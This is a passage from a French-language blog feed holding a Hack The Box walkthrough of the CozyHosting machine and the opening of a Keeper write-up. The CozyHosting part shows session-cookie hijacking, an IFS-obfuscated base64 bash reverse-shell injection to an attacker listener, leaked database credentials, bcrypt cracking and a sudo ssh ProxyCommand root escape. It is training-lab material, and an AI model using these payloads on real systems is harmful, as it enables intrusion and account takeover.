class="o">[</span>17:57:55<span class="o">]</span> <span class="m">200</span> - 4KB - /login </span></span><span class="line"><span class="cl"><span class="o">[</span>17:57:55<span class="o">]</span> <span class="m">200</span> - 0B - /login.wdm%2e </span></span><span class="line"><span class="cl"><span class="o">[</span>17:57:56<span class="o">]</span> <span class="m">204</span> - 0B - /logout </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Task Completed </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="session-cookie--kanderson-user">Session Cookie : kanderson user </h3><p>En allant sur le lien, on a pu découvrir un autre lien: <a class="link" href="http://cozyhosting.htb/actuator/sessions" target="_blank" rel="noopener" >http://cozyhosting.htb/actuator/sessions</a></p> <p>Il semblait contenir des cookies de sessions, donc celui d&rsquo;un utilisateur <strong>kanderson</strong>.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image.png" width="544" height="239" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image_hu_d38a4ebabcb6cecd.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image_hu_e39e51c982835ddc.png 1024w" loading="lazy" alt="cookie de session" class="gallery-image" data-flex-grow="227" data-flex-basis="546px" ></p> <h3 id="burp--admin-page">Burp : Admin Page </h3><p>En utilisant <strong>Burp</strong>, on pu envoyer une requête pour demander la page <strong>/admin</strong> puis la modifier à la volée pour écraser le cookie de session par celui trouvé précédemment. Et Bingo ! On arrive bien sur la page admin en tant que <strong>kanderson</strong>.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-1.png" width="404" height="338" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-1_hu_ade06baa472db5f8.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-1_hu_e362980c05c1a8ca.png 1024w" loading="lazy" alt="Burp modif cookie session" class="gallery-image" data-flex-grow="119" data-flex-basis="286px" ></p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-2.png" width="1823" height="916" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-2_hu_4cab2b73bed8d1cc.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-2_hu_d3d324078454065c.png 1024w" loading="lazy" alt="/admin page" class="gallery-image" data-flex-grow="199" data-flex-basis="477px" ></p> <p>On peut également modifier le cookie de session directement dans l&rsquo;outil de developpement du navigateur, ici firefox :</p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-3.png" width="781" height="149" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-3_hu_4e74d3f6edc711d4.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-3_hu_738be4e29d0d0e62.png 1024w" loading="lazy" alt="outil dev. modif cookie session" class="gallery-image" data-flex-grow="524" data-flex-basis="1257px" ></p> <p>On observe un formulaire de type <strong>POST</strong> avec deux paramètres. Si on rentre un hostname puis pas de username, une erreur s&rsquo;affiche indiquant que les parametres de ssh ne sont pas bon. Une injection de code semble possible !</p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-5.png" width="1017" height="422" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-5_hu_ffe5caa958d7f204.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-5_hu_9e02cf083ede9836.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="240" data-flex-basis="578px" > <img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-6.png" width="1021" height="377" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-6_hu_4d5aeff54b61c94.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-6_hu_8f692f86b0ab94e9.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="270" data-flex-basis="649px" ></p> <h3 id="reverse-shell">Reverse Shell </h3><p>Sur la machine hote, on prepare un reverse shell comme on va pouvoir envoyer dans burp à la machine cible. On le convertie en base64</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">echo</span> <span class="s2">&#34;bash -i &gt;&amp; /dev/tcp/10.10.14.25/44444 0&gt;&amp;1&#34;</span> <span class="p">|</span> base64 -w <span class="m">0</span> </span></span><span class="line"><span class="cl">YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg<span class="o">==</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## On execute une commande pour decoder le payload en base64 puis on appel &#34;bash&#34; pour executer le payload</span> </span></span><span class="line"><span class="cl"><span class="p">;</span>echo<span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span><span class="s2">&#34;YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0NCAwPiYxCg==&#34;</span><span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span><span class="p">|</span><span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span>base64<span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span>-d<span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span><span class="p">|</span><span class="si">${</span><span class="nv">IFS</span><span class="p">%??</span><span class="si">}</span>bash<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## URL encoded :</span> </span></span><span class="line"><span class="cl">%3Becho%24%7BIFS%25%3F%3F%7D%22YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMjUvNDQ0NDQgMD4mMQo%3D%22%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbase64%24%7BIFS%25%3F%3F%7D-d%24%7BIFS%25%3F%3F%7D%7C%24%7BIFS%25%3F%3F%7Dbash%3B </span></span></code></pre></td></tr></table> </div> </div><p>On envoie dans Burp en passant le payload dans une variable du formulaire POST :</p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-4.png" width="497" height="463" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-4_hu_cf843d39e79f729e.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-4_hu_3bab77320f725341.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="107" data-flex-basis="257px" ></p> <p>Sur la machine hôte, on attend avec <strong>nc</strong> sur le port 44444</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">Ctrl+Z </span></span><span class="line"><span class="cl">stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nc -lvp <span class="m">44444</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">44444</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.125<span class="o">]</span> from cozyhosting.htb <span class="o">[</span>10.10.11.230<span class="o">]</span> <span class="m">39782</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1063<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">app@cozyhosting:/app$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">app@cozyhosting:/app$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">app@cozyhosting:/app$ ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lvp <span class="m">44444</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lvp <span class="m">44444</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">app@cozyhosting:/app$ </span></span></code></pre></td></tr></table> </div> </div><h3 id="python--m-httpserver-4444">python -m http.server 4444 </h3><p>On trouve sur la machine un fichier <strong>.jar</strong> intéressant.</p> <h3 id="psql-bdd-credentials">PSQL bdd credentials </h3><p>Voici les infos qu&rsquo;on a pu trouver dans un fichier présent dans le jar.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">server.address<span class="o">=</span>127.0.0.1 </span></span><span class="line"><span class="cl">server.servlet.session.timeout<span class="o">=</span>5m </span></span><span class="line"><span class="cl">management.endpoints.web.exposure.include<span class="o">=</span>health,beans,env,sessions,mappings </span></span><span class="line"><span class="cl">management.endpoint.sessions.enabled <span class="o">=</span> <span class="nb">true</span> </span></span><span class="line"><span class="cl">spring.datasource.driver-class-name<span class="o">=</span>org.postgresql.Driver </span></span><span class="line"><span class="cl">spring.jpa.database-platform<span class="o">=</span>org.hibernate.dialect.PostgreSQLDialect </span></span><span class="line"><span class="cl">spring.jpa.hibernate.ddl-auto<span class="o">=</span>none </span></span><span class="line"><span class="cl">spring.jpa.database<span class="o">=</span>POSTGRESQL </span></span><span class="line"><span class="cl">spring.datasource.platform<span class="o">=</span>postgres </span></span><span class="line"><span class="cl">spring.datasource.url<span class="o">=</span>jdbc:postgresql://localhost:5432/cozyhosting </span></span><span class="line"><span class="cl">spring.datasource.username<span class="o">=</span>postgres </span></span><span class="line"><span class="cl">spring.datasource.password<span class="o">=</span>Vg<span class="p">&amp;</span>nvzAQ7XxR </span></span></code></pre></td></tr></table> </div> </div><p>On a essayé de se connecter grâce à ces infos et ça a fonctionné !</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">app@cozyhosting:/app$ psql -U postgres -h localhost -p <span class="m">5432</span> -d cozyhosting </span></span><span class="line"><span class="cl">Password <span class="k">for</span> user postgres: </span></span><span class="line"><span class="cl">psql <span class="o">(</span>14.9 <span class="o">(</span>Ubuntu 14.9-0ubuntu0.22.04.1<span class="o">))</span> </span></span><span class="line"><span class="cl">SSL connection <span class="o">(</span>protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off<span class="o">)</span> </span></span><span class="line"><span class="cl">Type <span class="s2">&#34;help&#34;</span> <span class="k">for</span> help. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">cozyhosting</span><span class="o">=</span><span class="c1"># </span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="users-table--hashes">Users table : hashes </h3><p>On fouillant dans la base on a trouvé la table users, avec des hashs de mots de passe.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">cozyhosting</span><span class="o">=</span><span class="c1"># \dt</span> </span></span><span class="line"><span class="cl"><span class="nv">cozyhosting</span><span class="o">=</span><span class="c1"># select * from users;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> kanderson <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$E</span>/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim <span class="p">|</span> User </span></span><span class="line"><span class="cl"> admin <span class="p">|</span> <span class="nv">$2</span>a<span class="nv">$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm</span> <span class="p">|</span> Admin </span></span></code></pre></td></tr></table> </div> </div><h3 id="john-cracking-admin-password">john: Cracking admin password </h3><p>On a ensuite réussi a cracker le hash du mot de passe de l&rsquo;utilisateur admin :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Hacking/HackTheBox/Machines/CozyHosting<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ john --wordlist<span class="o">=</span>/usr/share/wordlists/rockyou.txt admin_hash.txt </span></span><span class="line"><span class="cl">Using default input encoding: UTF-8 </span></span><span class="line"><span class="cl">Loaded <span class="m">1</span> password <span class="nb">hash</span> <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3<span class="o">])</span> </span></span><span class="line"><span class="cl">Cost <span class="m">1</span> <span class="o">(</span>iteration count<span class="o">)</span> is <span class="m">1024</span> <span class="k">for</span> all loaded hashes </span></span><span class="line"><span class="cl">Will run <span class="m">2</span> OpenMP threads </span></span><span class="line"><span class="cl">Press <span class="s1">&#39;q&#39;</span> or Ctrl-C to abort, almost any other key <span class="k">for</span> status </span></span><span class="line"><span class="cl">manchesterunited <span class="o">(</span>?<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:00:34 DONE <span class="o">(</span>2023-12-29 19:57<span class="o">)</span> 0.02868g/s 80.55p/s 80.55c/s 80.55C/s dougie..keyboard </span></span><span class="line"><span class="cl">Use the <span class="s2">&#34;--show&#34;</span> option to display all of the cracked passwords reliably </span></span><span class="line"><span class="cl">Session completed. </span></span></code></pre></td></tr></table> </div> </div><p>Il s&rsquo;agit donc de <strong>manchesterunited</strong>.</p> <h3 id="ssh-josh--user-flag">SSH josh : user flag </h3><p>Un peu plus tôt, avait pu accéder au fichier /etc/passwd et on avait alors trouver un nom d&rsquo;utilisateur <strong>josh</strong>. De plus, on pouvait aussi le trouver en se deplaçant dans <strong>/home</strong>. Or, cet utilisateur à le rôle administrateur donc le mot de passe devrait fonctionné en ssh:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/Hacking/HackTheBox/Machines/CozyHosting<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh josh@10.10.11.230 </span></span><span class="line"><span class="cl">josh@10.10.11.230<span class="err">&#39;</span>s password: </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-82-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> * Documentation: https://help.ubuntu.com </span></span><span class="line"><span class="cl"> * Management: https://landscape.canonical.com </span></span><span class="line"><span class="cl"> * Support: https://ubuntu.com/advantage </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System information as of Sat Dec <span class="m">30</span> 01:01:53 AM UTC <span class="m">2023</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> System load: 0.0068359375 </span></span><span class="line"><span class="cl"> Usage of /: 59.8% of 5.42GB </span></span><span class="line"><span class="cl"> Memory usage: 48% </span></span><span class="line"><span class="cl"> Swap usage: 0% </span></span><span class="line"><span class="cl"> Processes: <span class="m">262</span> </span></span><span class="line"><span class="cl"> Users logged in: <span class="m">0</span> </span></span><span class="line"><span class="cl"> IPv4 address <span class="k">for</span> eth0: 10.10.11.230 </span></span><span class="line"><span class="cl"> IPv6 address <span class="k">for</span> eth0: dead:beef::250:56ff:feb9:2531 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Expanded Security Maintenance <span class="k">for</span> Applications is not enabled. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">0</span> updates can be applied immediately. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Enable ESM Apps to receive additional future security updates. </span></span><span class="line"><span class="cl">See https://ubuntu.com/esm or run: sudo pro status </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The list of available updates is more than a week old. </span></span><span class="line"><span class="cl">To check <span class="k">for</span> new updates run: sudo apt update </span></span><span class="line"><span class="cl">Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Last login: Fri Dec <span class="m">29</span> 19:20:45 <span class="m">2023</span> from 10.10.14.94 </span></span><span class="line"><span class="cl">josh@cozyhosting:~$ cat user.txt </span></span><span class="line"><span class="cl">db25.....2400 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="josh--ssh-as-root">josh : SSH as root </h3><p>On observe que josh a le droit d&rsquo;executer la commande <strong>/usr/bin/ssh</strong> suivi de n&rsquo;importe quel paramètre en mode <strong>root</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">josh@cozyhosting:~$ sudo -l </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> password <span class="k">for</span> josh: </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> josh on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin, use_pty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User josh may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> /usr/bin/ssh * </span></span></code></pre></td></tr></table> </div> </div><p>En allant sur ce site internet, on peut trouver comment générer un shell interactif en partant d&rsquo;une autre commande. Par exemple ici, pour la commande ssh : <a class="link" href="https://gtfobins.github.io/gtfobins/ssh/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/ssh/</a></p> <p><img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-8.png" width="836" height="701" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-8_hu_daed3cae5e0c04e3.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-8_hu_933cb38282eee888.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="119" data-flex-basis="286px" ></p> <p>Pour la commande <strong>ssh</strong>, on obtient 3 manières potentiels d&rsquo;obtenir un shell. <img src="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-7.png" width="839" height="516" srcset="https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-7_hu_9b4010990c5ee673.png 480w, https://leopoldabgn.github.io/writeups/p/cozyhosting-htb/image-7_hu_30735b1fee8904df.png 1024w" loading="lazy" alt="Alt text" class="gallery-image" data-flex-grow="162" data-flex-basis="390px" ></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## 1ère commande</span> </span></span><span class="line"><span class="cl"><span class="c1">## Ca n&#39;a pas fonctionné car il demande le mot de passe root</span> </span></span><span class="line"><span class="cl">josh@cozyhosting:~$ sudo /usr/bin/ssh localhost <span class="nv">$SHELL</span> --noprofile --norc </span></span><span class="line"><span class="cl">root@localhost password: </span></span><span class="line"><span class="cl">Permission denied, please try again. </span></span><span class="line"><span class="cl">root@localhost password: </span></span><span class="line"><span class="cl">Permission denied, please try again. </span></span><span class="line"><span class="cl">root@localhost password: </span></span><span class="line"><span class="cl">root@localhost: Permission denied <span class="o">(</span>publickey,password<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## 2ème commande</span> </span></span><span class="line"><span class="cl"><span class="c1">## Ca fonctionne !! On est root sans avoir besoin du mot de passe !</span> </span></span><span class="line"><span class="cl">josh@cozyhosting:~$ sudo /usr/bin/ssh -o <span class="nv">ProxyCommand</span><span class="o">=</span><span class="s1">&#39;;sh 0&lt;&amp;2 1&gt;&amp;2&#39;</span> x </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">user.txt usr </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">$ cat root.txt </span></span><span class="line"><span class="cl">9ab6.....ba3d5 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/keeper-htb/Fri, 29 Dec 2023 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/keeper-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Keeper cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Keeper</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.227</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo nmap -sV -sC -A -n -p- 10.10.11.227 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3539d439404b1f6186dd7c37bb4b989e <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 1ae972be8bb105d5effedd80d8efc066 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title <span class="o">(</span>text/html<span class="o">)</span>. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="website--ticketskeeperhtb">Website : tickets.keeper.htb </h3><p>On observe que le port 80 est ouvert. En allant sur firefox, on peut voir une phrase menant vers un lien</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" 